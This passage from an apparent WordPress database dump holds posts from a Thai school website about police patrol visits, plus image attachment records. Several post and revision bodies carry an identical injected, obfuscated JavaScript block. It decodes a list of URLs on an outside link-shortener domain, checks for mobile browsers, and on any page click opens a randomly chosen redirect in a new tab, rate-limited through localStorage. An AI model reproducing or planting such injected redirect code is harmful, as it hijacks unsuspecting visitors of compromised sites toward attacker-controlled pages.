Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-21','','','2024-08-01 20:36:55','2024-08-01 13:36:55','',0,'http://pakhaeng.ssk.in.th/?p=395',0,'post','',0),
(396,1,'2024-08-01 20:36:44','2024-08-01 13:36:44','','9-67','','inherit','','closed','','9-67','','','2024-08-01 20:36:44','2024-08-01 13:36:44','',395,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/9-67.png',0,'attachment','image/png',0),
(397,1,'2024-08-01 20:36:54','2024-08-01 13:36:54','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 29 กุมภาพันธ์ 2567</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ร้อยตำรวจเอกธนวรรธน์ พูนทวีวรกิตติ์ </strong><strong>รองสารวัตรป้องกันปราบปราม สภ.โนนคูณ พร้อมด้วยคณะ ได้ออกตรวจเวรประจำวัน ที่โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เพื่อตรวจความเรียบร้อย และปลอดภัยในสถานศึกษา โดยมี</strong><strong>นางเสน่หา พลโสภา</strong><strong> ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู ได้อำนวยความสะดวก ในการออกตรวจ ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":396,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/9-67-724x1024.png\" alt=\"\" class=\"wp-image-396\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','395-revision-v1','','','2024-08-01 20:36:54','2024-08-01 13:36:54','',395,'http://pakhaeng.ssk.in.th/?p=397',0,'revision','',0),
(398,1,'2024-08-01 20:38:07','2024-08-01 13:38:07','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 2 มีนาคม พ.ศ.2567</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>เวลา 10.22 น.</strong><strong> </strong><strong>ร้อยตำรวจเอกพงษ์ศักดิ์ กุลบุตร</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>รอง สารวัตรป้องกันปราบปราม</strong><strong> </strong><strong>สภ.โนนคูณ ได้ออกตรวจเยี่ยม โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และตรวจเยี่ยมสนามสอบ นักเรียน ศูนย์การศึกษานอกระบบ ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีท่าน</strong><strong>ผู้อำนวยการโรงเรียนเสน่หา</strong><strong> </strong><strong>พลโสภา </strong><strong>พร้อมด้วยคณะครู ได้ดูแล และอำนวยความสะดวกในการตรวจเยี่ยม ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":400,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/10-67-1-724x1024.png\" alt=\"\" class=\"wp-image-400\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-22','','','2024-08-01 20:38:09','2024-08-01 13:38:09','',0,'http://pakhaeng.ssk.in.th/?p=398',0,'post','',0),
(399,1,'2024-08-01 20:37:27','2024-08-01 13:37:27','','10-67','','inherit','','closed','','10-67','','','2024-08-01 20:37:27','2024-08-01 13:37:27','',398,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/10-67.png',0,'attachment','image/png',0),
(400,1,'2024-08-01 20:37:55','2024-08-01 13:37:55','','10-67','','inherit','','closed','','10-67-2','','','2024-08-01 20:37:55','2024-08-01 13:37:55','',398,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/10-67-1.png',0,'attachment','image/png',0),
